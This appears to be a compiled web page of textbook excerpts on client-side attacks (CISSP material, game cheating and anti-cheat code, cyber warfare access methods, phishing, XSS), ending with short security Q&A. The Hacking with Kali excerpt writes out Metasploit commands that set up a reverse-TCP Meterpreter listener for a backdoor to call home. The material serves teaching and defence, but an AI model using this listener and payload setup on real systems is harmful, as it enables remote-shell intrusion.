What type of attack involves the hacker inserting a client side script into the web page?

Domain 3

Eric Conrad, ... Joshua Feldman, in Eleventh Hour CISSP® (Third Edition), 2017

Client-Side Attacks

Client-side attacks occur when a user downloads malicious content. The flow of data is reversed compared to server-side attacks: client-side attacks initiate from the victim who downloads content from the attacker.

Client-side attacks are difficult to mitigate for organizations that allow Internet access. Clients include word processing software, spreadsheets, media players, Web browsers, etc. Most firewalls are far more restrictive inbound compared to outbound; they were designed to “keep the bad guys out,” and mitigate server-side attacks originating from untrusted networks. They often fail to prevent client-side attacks.


URL: https://www.sciencedirect.com/science/article/pii/B9780128112489000036

Domain 3: Security Engineering (Engineering and Management of Security)

Eric Conrad, ... Joshua Feldman, in CISSP Study Guide (Third Edition), 2016

Client-Side Attacks

Client-side attacks occur when a user downloads malicious content. The flow of data is reversed compared to server-side attacks: client-side attacks initiate from the victim who downloads content from the attacker, as shown in Figure 4.16.


Figure 4.16. Client-Side Attack

Client-side attacks are difficult to mitigate for organizations that allow Internet access. Clients include word processing software, spreadsheets, media players, Web browsers, etc. Browsers such as Internet Explorer and Firefox are actually a collection of software: the browser itself, plus third-party software such as Adobe Acrobat Reader, Adobe Flash, iTunes, QuickTime, RealPlayer, etc. All are potentially vulnerable to client-side attacks. All client-side software must be patched, a challenge many organizations struggle with.

Most firewalls are far more restrictive inbound compared to outbound: they were designed to “keep the bad guys out,” and mitigate server-side attacks originating from untrusted networks. They often fail to prevent client-side attacks.


URL: https://www.sciencedirect.com/science/article/pii/B9780128024379000047

Application support issues

Anthony Steed, Manuel Fradinho Oliveira, in Networked Graphics, 2010

13.1.1 Client-side attacks

Client-side attacks are changes to the client software to effect some advantage for the player. What can be achieved here depends critically on what the client software is responsible for.

In a peer-to-peer NVE, the client is usually responsible for calculating the results of its own actions. If the client can be hacked, then basically anything is possible. The client could give itself more resources, present diagnostic information about the status of the system or so on. Essentially any information that the client has to calculate its own state is available to be inspected and altered. As Koster puts it, “The client is in the hands of the enemy” (Koster, 2009). In general client-side hacks have been around almost as long as games. There are various pieces of software, often called trainers, which allow judicious edits to be made to game client software to gain an advantage. Originally these were designed to make single-player games easier, often by enabling more lives or a longer time limit. Indeed games companies were often complicit in publishing such codes, and games magazines used to, and occasionally still do, print out instructions for using these trainers on specific games. Their use for single-player games is fairly benign, but for NGs it can be a serious problem.

One infamous example is the Warcraft III™ Maphack (Chambers, et al., 2005). Warcraft III™ is a real-time strategy game using an isometric view and an overview map. As part of the gameplay, the player should only be visually aware of the world around them out to a certain distance. The idea is that most of the world is undiscovered, and the other players are hidden from each other. However, being a peer-to-peer game, each client must actually have the state of the other players as this state might influence the results of their actions. Thus the normal game is effectively hiding information that it holds from the player. The maphack turns off this hiding so that all activity is revealed and the player using the maphack has a significant advantage.

With client/server systems such straightforward hacks aren’t so feasible. The server holds the important data and can send the client data on a need-to-know basis. Unfortunately, even though the data might be restricted, the system is still open to several types of attack.

One example attack is again related to the issue of visibility of objects. The Quake server uses a PVS to filter entities that a client is not able to see (Kirsch, D., cited in Capps & Teller, 1997). However, a PVS is a cell-to-cell visibility data structure and thus it is conservative from any particular viewpoint. This means that the server sends the positions of a few entities that the player can’t yet see. If the client makes the walls of the world invisible, it can probably see clients coming around corners before it should be able to.

A second type of attack is to augment the player’s skill. The client software only sends control input, but a client can make sure that the control input is the “best” input that there could possibly be. For example, it could always correct the aim of a user to hit the target on screen. It could even fire for them when it was appropriate to do this. These types of assist are commonly known as aimbots. Another variant is to provide complex behaviors automatically. An example would be in an MMOG where the actions to complete a task would essentially be automated. Automatically controlled entities are generally called bots. One very capable such bot is the Glider® software from MDY Industries, LLC (MMOGlider, 2009) which can automate and complete tasks in World of Warcraft™. Obviously such software is highly controversial, both with developers and other users.

There are many more types of attack, but these examples are the main vectors of attack: subverting the display of information and subverting the control input. Detecting these types of attack is difficult. Two main approaches are used: verification of the client and behavior tracking.

Client verification is a process of making sure that the client code has not been altered. This can be done simply by examining memory and disk to verify the application code and data, and also detect any known hostile programs on the machine. This type of verification is now quite common on games for PC, with Punkbuster™ from Even Balance Inc. being an example. The use of such programs is controversial because such processes could scan sensitive information in other programs. Client verification is not so much of an issue on console games because the games are signed and the console hardware can authenticate them.

Behavior tracking looks for characteristic patterns in user or entity traffic. A naïve use of any of the techniques above would be easily detectable: no real player’s reaction time is that good, and no-one’s aim is perfect; bots tend to do repetitive, monotonously timed actions, whereas real players vary their performance.

Behavior tracking can easily be done on a server in a client/server system. A server can, of course, trivially reject any messages that are impossible for the player. Thus certain behaviors (e.g. instantaneous aiming implying a reaction time of 0 ms) can be detected easily. Otherwise behavior needs to be recorded and analyzed. Chen, et al. (2006) detect bots in the game Ragnarok Online™ by observing the client message traffic. They observe that bots tend to release packets in regular intervals and that they don’t adapt, as do real players, to network congestion. In Chen et al. (2009), bots are detected based on their trajectories. The authors note that although bots try to simulate human traffic, certain features of their traffic, such as movement rate and turns, can be used to create detectors if behavior can be tracked for a long enough period. They state that they can detect popular bots for the game Quake II at 95% accuracy given a behavior log of 200 seconds or longer. Yeung et al. (2006) propose a system to detect aimbots in first-person shooters based on statistical observation of game state changes. Kim et al. (2005) and Thawonmas et al. (2008) also use statistical tests to detect bots in MMOG by noting the frequency and patterns of actions.
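The two detection ideas in the paragraph above, a server rejecting control messages that are impossible for a player and flagging the metronomic packet timing of bots, as an added example (not code from the book or from the cited papers); the input trace and the reaction-time and jitter thresholds are constructed assumptions:

```python
"""Behaviour-tracking checks over a constructed client input trace.

Rule 1: a fire event sent before (or at the instant) its target became
visible implies a reaction time of 0 ms or less; the server can reject it
outright.  Rule 2: bots release packets on a fixed timer, so the relative
jitter of their inter-arrival times is far below that of a human.
Thresholds are illustrative assumptions, not figures from the book.
"""
from dataclasses import dataclass
from statistics import mean, pstdev
from typing import List, Optional

# Assumed tuning constants (not from the source).
MIN_HUMAN_REACTION_MS = 100   # faster than this is suspicious, <= 0 impossible
MIN_HUMAN_INTERVAL_CV = 0.10  # relative jitter below this looks scripted


@dataclass
class InputEvent:
    t_ms: int                                # server receive time of the packet
    action: str                              # "move" or "fire"
    target_visible_ms: Optional[int] = None  # when the fired-at target appeared


def reaction_ms(e: InputEvent) -> Optional[int]:
    """Reaction time for a fire event, None for anything else."""
    if e.action != "fire" or e.target_visible_ms is None:
        return None
    return e.t_ms - e.target_visible_ms


def impossible_events(events: List[InputEvent]) -> List[InputEvent]:
    """Rule 1: reactions of 0 ms or less cannot come from a player."""
    return [e for e in events if (r := reaction_ms(e)) is not None and r <= 0]


def suspicious_reactions(events: List[InputEvent]) -> List[InputEvent]:
    """Possible but implausibly fast reactions: record them for analysis."""
    return [e for e in events
            if (r := reaction_ms(e)) is not None and 0 < r < MIN_HUMAN_REACTION_MS]


def interval_cv(events: List[InputEvent]) -> Optional[float]:
    """Rule 2: coefficient of variation of packet inter-arrival times."""
    times = sorted(e.t_ms for e in events)
    gaps = [b - a for a, b in zip(times, times[1:])]
    if len(gaps) < 2 or mean(gaps) == 0:
        return None
    return pstdev(gaps) / mean(gaps)


def classify(events: List[InputEvent]) -> List[str]:
    """Return the flags raised for one client's trace (empty list = clean)."""
    flags = []
    if impossible_events(events):
        flags.append("impossible_reaction")
    if suspicious_reactions(events):
        flags.append("fast_reaction")
    cv = interval_cv(events)
    if cv is not None and cv < MIN_HUMAN_INTERVAL_CV:
        flags.append("regular_intervals")
    return flags


# Constructed traces (not captured data): a scripted client on a 100 ms
# timer and a human with irregular timing and realistic reaction times.
BOT_TRACE = [
    InputEvent(100, "move"),
    InputEvent(200, "fire", target_visible_ms=200),   # reaction 0 ms
    InputEvent(300, "move"),
    InputEvent(400, "fire", target_visible_ms=380),   # reaction 20 ms
    InputEvent(500, "move"),
    InputEvent(600, "move"),
]
HUMAN_TRACE = [
    InputEvent(0, "move"),
    InputEvent(180, "move"),
    InputEvent(410, "fire", target_visible_ms=190),   # reaction 220 ms
    InputEvent(560, "move"),
    InputEvent(820, "fire", target_visible_ms=530),   # reaction 290 ms
    InputEvent(990, "move"),
    InputEvent(1250, "move"),
]

if __name__ == "__main__":
    for name, trace in (("bot", BOT_TRACE), ("human", HUMAN_TRACE)):
        print(name, classify(trace), interval_cv(trace))
```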

In a peer-to-peer system where there is no central server that can observe cause and effect, peers can audit one another to make sure that no one is inserting impossible events. Goodman & Verbrugge (2008) propose such a scheme.

A specific type of behavior that supports a range of attacks is a lookahead cheat (Baughman & Levine, 2001) where a client’s response is purposefully delayed. This has various guises, but at its simplest, a client lies about its network delays and thus receives updates from other players in plenty of time to respond. This is strongly related to the issues of bucket synchronization and playout delays discussed in Chapter 11. For the specific case of lockstep simulation games, Baughman & Levine show that cheating can be prevented by having the parties exchange a secure hash of their proposed moves before revealing their actual moves. This is appropriate for many games, but lockstep protocols aren’t sufficient for continuous actions. Cronin et al. (2003) show how to detect cheating in dead-reckoning protocols. GauthierDickey et al. (2004) extend four types of protocol for NVEs to prevent cheating while retaining overall low latency.
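The commit-then-reveal step that Baughman & Levine use against the lookahead cheat, worked through for one lockstep turn as an added example (not the authors' code); the choice of SHA-256, the nonce length and the message layout are assumptions:

```python
"""One lockstep turn with hashed commitments.

Each party first publishes a hash of its proposed move, and only reveals the
move once it holds the other side's commitment.  A player who delays its
response to see the opponent's move first (the lookahead cheat) can no
longer change what it committed to without the mismatch being detected.
"""
import hashlib
import secrets
from dataclasses import dataclass
from typing import Optional, Tuple


@dataclass(frozen=True)
class Commitment:
    player: str
    digest: str


@dataclass(frozen=True)
class Reveal:
    player: str
    move: str
    nonce: str


def commit_digest(move: str, nonce: str) -> str:
    # Domain-separated, delimited encoding so "ab"+"c" and "a"+"bc" differ.
    data = b"lockstep-move\x00" + nonce.encode() + b"\x00" + move.encode()
    return hashlib.sha256(data).hexdigest()


class Player:
    def __init__(self, name: str) -> None:
        self.name = name
        self.move: Optional[str] = None
        self.nonce: Optional[str] = None

    def commit(self, move: str) -> Commitment:
        self.move = move
        # Random nonce: without it a small move space (e.g. four directions)
        # could be brute-forced from the digest before the reveal.
        self.nonce = secrets.token_hex(16)
        return Commitment(self.name, commit_digest(move, self.nonce))

    def reveal(self) -> Reveal:
        assert self.move is not None and self.nonce is not None
        return Reveal(self.name, self.move, self.nonce)


def verify_reveal(commitment: Commitment, reveal: Reveal) -> bool:
    """Accept a reveal only if it reproduces the digest committed earlier."""
    return (commitment.player == reveal.player
            and commit_digest(reveal.move, reveal.nonce) == commitment.digest)


def run_round(move_a: str, move_b: str,
              bob_substitute: Optional[str] = None) -> Tuple:
    """Returns ("ok", move_a, move_b) or ("reject", offending_player)."""
    alice, bob = Player("alice"), Player("bob")
    # Phase 1: exchange commitments; neither side learns the other's move.
    c_a, c_b = alice.commit(move_a), bob.commit(move_b)
    # Phase 2: Alice reveals first.  A lookahead cheater (Bob) delays, reads
    # her move and tries to answer with a better one than he committed to.
    r_a = alice.reveal()
    r_b = bob.reveal()
    if bob_substitute is not None:
        r_b = Reveal("bob", bob_substitute, bob.nonce)
    # Phase 3: each side checks the other's reveal against its commitment.
    if not verify_reveal(c_a, r_a):
        return ("reject", "alice")
    if not verify_reveal(c_b, r_b):
        return ("reject", "bob")
    return ("ok", r_a.move, r_b.move)


if __name__ == "__main__":
    print(run_round("north", "east"))
    print(run_round("north", "east", bob_substitute="block-north"))
```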

Certain types of graphics hacks are very hard to prevent other than by client authentication. The reason for this is that they simply change the way the graphics card renders the image, and thus the graphics card itself can be compromised with altered drivers. As an extreme example, the Chromium system allows the graphics command stream to be intercepted and the whole look of the graphics to be changed (Humphreys et al., 2002). One of Chromium’s example applications is taking Quake III and converting the renderings from their default appearance to pen and ink-style rendering.

Because of the importance of NVEs and NGs, this area is expanding rapidly, partly because as one type of cheat is prevented, another springs up.


URL: https://www.sciencedirect.com/science/article/pii/B9780123744234000136

Computer Network Attack

Jason Andress, Steve Winterfeld, in Cyber Warfare, 2011

Access

Gaining access to a system can take place using a variety of tools and methods. If we have been successful in any of our previous attempts at social engineering, dumpster diving, stealing or cloning access cards, such as Common Access Cards (CACs), or have managed to find accounts with synchronized passwords on other systems that we have been able to access, we may very well have legitimate credentials with which we can simply log in. Slightly more complicated than this, although more likely, is that we will be able to find usernames that exist on the system and either crack or guess passwords, using some of the tools that we discussed in Chapter 5, in order to access them.

Another potential path that may gain us easy access would be to use client side attacks against individual systems that belong to the users of our target system. Such attacks utilize vulnerabilities in software running on the client, such as a web browser, as an attack vector. We stand a much greater chance of being able to access individual workstations in order to gain access to credentials than we do when attempting to access a server that is carefully maintained and patched. Client side attacks can be web-based, use email as a delivery method, ride in on a USB drive, or any of a number of other methods. Particularly in non-technical working environments, such attacks enjoy a high degree of success, although we may not find as much success in highly secured environments.

Tip

Client side attacks are often some of the most effective attacks that we can carry out. Such attacks, when combined with a certain element of social engineering, as we discussed in Chapter 7, are very difficult to defend against. When we use human carelessness or ignorance as an attack vector, we will often enjoy success.

We can also attempt to use common operating system or application exploits in order to access a system. We have likely, at some point in the process, already used one or more of a variety of vulnerability scanning tools, either during the more general reconnaissance process, or during the more specific examination during the attack process.

Note

In the case of a true cyber attack, we will likely not be using exploits that are available to the general public. Such attacks are likely to already be patched or mitigated in some fashion, and easily rebuffed. Instead, we will be using zero day exploits which stand a much greater chance of success, due to not being commonly known.

Many common vulnerability analysis tools, such as Nessus, which we discussed in Chapter 5, can be used to locate vulnerabilities that we might use to access a system. Although it is unlikely that we will gain access in such a fashion on a fully patched system running a recent operating system, there are plenty of systems that are likely not in such a well-maintained state to which we may easily be able to gain access. It is also important to test our attacks in an environment as close as possible to the actual target as we can create. This will allow us to not only test our exploits, but to also help develop contingency plans to potentially compensate for issues that we might encounter when attacking.


URL: https://www.sciencedirect.com/science/article/pii/B9781597496377000095

Client-Side Attacks Defined

Sean-Philip Oriyano, Robert Shimonski, in Client-Side Attacks and Defense, 2012

Social Engineering

This client-side attack is becoming more common, as almost everyone has an email address and receives email, and at some point that could lead to a phishing attack. In this type of attack the trust in a web site is used to fraudulently obtain confidential data, such as login or account credentials and bank account information. These attacks succeed because the user is presented with a fraudulent but highly authentic-looking web site, usually via spam, which appears to originate from a trusted entity, such as a bank. The web site that the user is sent to, however, is under the control of a malicious party, and when the user provides information to it, such as personal information, the attacker has obtained this confidential information. Sometimes you may be directed straight to the malicious site; otherwise you may be redirected to it via a script.

Note

A variation of a phishing attack that is quite successful in acquiring information from end users who lack the knowledge to detect it is known as a spear phishing attack. Spear phishing attacks take place when specific individuals are targeted with the intention of gathering information that only they may possess; this is in contrast to normal phishing, which sends the message out en masse.

An additional form of phishing goes by the term whaling which refers to the practice of targeting phishing emails towards executives or higher-ups in a company.

In both cases the victims are not chosen wholly at random; rather, they are chosen because the information they have may be of greater value than that of others.


URL: https://www.sciencedirect.com/science/article/pii/B9781597495905000018

Dissection of a Client-Side Attack

Sean-Philip Oriyano, Robert Shimonski, in Client-Side Attacks and Defense, 2012

Summary

In this chapter client-side attacks were discussed in more depth, including attacks such as cross-site scripting (XSS). As we observed, client-side attacks can extract information or compromise the client in some way, whether by pulling information out of a cookie or by taking information from a system and using it to target other users. We also saw that, against common client-side attacks, defenses are less than effective and may in fact be non-existent, making it crucial that we as security professionals take heed and do what we can to educate users, properly secure systems, know how to analyze and mitigate attacks, and ultimately protect against them if we cannot stop them from happening in the first place.


URL: https://www.sciencedirect.com/science/article/pii/B978159749590500002X

Securing Against Client-Side Attack

Sean-Philip Oriyano, Robert Shimonski, in Client-Side Attacks and Defense, 2012

Summary

To secure against client-side attacks you need to be vigilant and practice security in every process of deployment—with application development, with the infrastructure, and with the desktop environment or mobile devices that will be used. In sum, this book took a close look at client-side attacks and the defense posture needed to thwart or mitigate them.

In this chapter we covered how to secure applications from the perspective of development and how to lock down the infrastructure that the applications run on. We then looked at securing the desktop client by patching it and closing every available hole an attacker may look into.

As security professionals we must always consider that our systems are vulnerable. They are living devices, always in flux: things are added to them, and new code, software and applications are constantly developed and used. They are used more and more, and additional functionality is always being added. Because they are living, so must be the security we apply to them. We must always stay ahead of the curve and think of every potential issue that may occur. We must educate those who use the systems and applications so that we can better defend them. Client-side attacks are prevalent, but so is the movement to secure against them. Continue the charge and hopefully we can all stay one step ahead of the next attack. Until then…


URL: https://www.sciencedirect.com/science/article/pii/B9781597495905000109

Messaging Attacks and Defense

Sean-Philip Oriyano, Robert Shimonski, in Client-Side Attacks and Defense, 2012

In this chapter we will cover the client-side attacks posed by messaging clients such as email applications, whether they are found within web browsers or as their own stand-alone clients. Email messaging has become one of the most essential ways we communicate today. In today’s world email is inarguably one of the “must have” components of modern business and life, which also means that the email application or client is a common and essential component. Email clients, much like web browsers, are present on the majority of systems and platforms; in fact just about every operating system comes with some sort of email client already installed and just waiting to be configured. Since the email client and its usage are so common, it has also become a very attractive and popular target for attacks of all types. We will start our discussion with the email application as an application: how it has evolved, how it is attacked, and ways to defend against and mitigate these threats.

Note

The email clients discussed here are not meant to imply that one client is better than another in any way. In this text we only seek to discuss how email clients are attacked, how they are vulnerable, and what can be done to limit the types and impact of the attacks against them. It should also be noted that you can, and many times will, access your email via a web-based email client through a web browser, whether on a corporate workstation, home computer, wireless device or phone. We will cover each area here, with an emphasis on mobile devices in Chapter 9.


URL: https://www.sciencedirect.com/science/article/pii/B9781597495905000079

Maintaining Access

James Broad, Andrew Bindner, in Hacking with Kali, 2014

Set Up a Metasploit Listener

The backdoors and Trojan horses that were created are client-side attacks and call home for further instructions. The penetration tester will need to set up a listener in Metasploit to answer the call. The multi-handler within Metasploit is a glorified answering service for a Trojan or backdoor to call home and receive further instructions.

1. msfconsole
2. use exploit/multi/handler
3. set PAYLOAD windows/meterpreter/reverse_tcp
4. set LHOST {YOUR_IP}
5. set LPORT {PORT}
6. run

Figure 10.5 shows the setup of a listener in Metasploit and a call back from a backdoor. The connection was made from the victim’s operating system when the unencoded-payload.exe application was executed.


Figure 10.5. Metasploit multi-handler listening.


URL: https://www.sciencedirect.com/science/article/pii/B9780124077492000100

Computer Network Attack

Jason Andress, Steve Winterfeld, in Cyber Warfare (Second Edition), 2014

Access

Gaining access to a system can take place using a variety of tools and methods. If we have been successful in any of our previous attempts at social engineering, dumpster diving, stealing, or cloning access cards, such as Common Access Cards (CACs) mandated by Homeland Security Presidential Directive 12: Policy for a Common Identification Standard for Federal Employees and Contractors or have managed to find accounts with synchronized passwords on other systems that we have been able to access, we may very well have legitimate credentials with which we can simply log in. Slightly more complicated than this, although more likely, is that we will be able to find usernames that exist on the system and either crack or guess passwords, using some of the tools that we discussed in Chapter 6, in order to access them.

Another potential path that may gain us easy access would be to use client-side attacks against individual systems that belong to the users of our target system. Such attacks utilize vulnerabilities in software running on the client, such as a web browser, as an attack vector. We stand a much greater chance of being able to access individual workstations in order to gain access to credentials than we do when attempting to access a server that is carefully maintained and patched. Client-side attacks can be web-based, use email as a delivery method, ride in on a USB drive, or any of a number of other methods. One example of this that is commonly known today is the 2008 cyber attack on U.S. military computers named “Operation Buckshot Yankee.” The case involved USB flash drives infected by a foreign intelligence agency and prompted the military to ban the use of them [2]. Particularly in nontechnical working environments, such attacks enjoy a high degree of success, although we may not find as much success in highly secured environments.

Tip

Client-side attacks are often some of the most effective attacks that we can carry out. Such attacks, when combined with a certain element of social engineering, as we discussed in Chapter 8, are very difficult to defend against. When we use human carelessness or ignorance as an attack vector, we will often enjoy success.

We can also attempt to use common operating system or application exploits in order to access a system. We have likely, at some point in the process, already used one or more of a variety of vulnerability scanning tools, either during the more general reconnaissance process, or during the more specific examination during the attack process.

Note

In the case of a cyber attack, we will likely not use exploits that are available to the general public. Such vulnerabilities are likely to already be patched or mitigated in some fashion, and easily rebuffed. Instead, we will use zero-day exploits which stand a much greater chance of success, due to not being commonly known.

Many common vulnerability analysis tools, such as Nessus, which we discussed in Chapter 6, can be used to locate vulnerabilities that we might use to access a system. Although it is unlikely that we will gain access in such a fashion on a fully patched system running a recent operating system, there are plenty of systems that are likely not in such a well-maintained state to which we may easily be able to gain access. It is also important to test our attacks in an environment as close as possible to the actual target as we can create. This will allow us to not only test our exploits, but to also help develop contingency plans to potentially compensate for issues that we might encounter when attacking.


URL: https://www.sciencedirect.com/science/article/pii/B9780124166721000106

What type of attack involves the attacker inserting a client side script into the web page?

Cross-site scripting attacks, also called XSS attacks, are a type of injection attack that injects malicious code into otherwise safe websites. An attacker will use a flaw in a target web application to send some kind of malicious code, most commonly client-side JavaScript, to an end user.

What type of attack involves the hacker modifying the source IP address of the packet?

In an IP spoofing attack, an attacker will send IP packets from a spoofed IP address to hide their true identity. Attackers most often use IP address spoofing attacks in DoS attacks that overwhelm their target with network traffic.

What type of attack involves the hacker sending too much data?

A buffer overflow attack is when the hacker sends too much data to an application, causing the data to get stored beyond the buffer area. An SQL injection attack is when the hacker inserts SQL commands into an application to control the flow of the application.

What type of attack can a hacker perform that involves injecting?

One of the most common ways an attacker can deploy a cross-site scripting attack is by injecting malicious code into a comment or a script that could automatically run. For example, they could embed a link to a malicious JavaScript in a comment on a blog.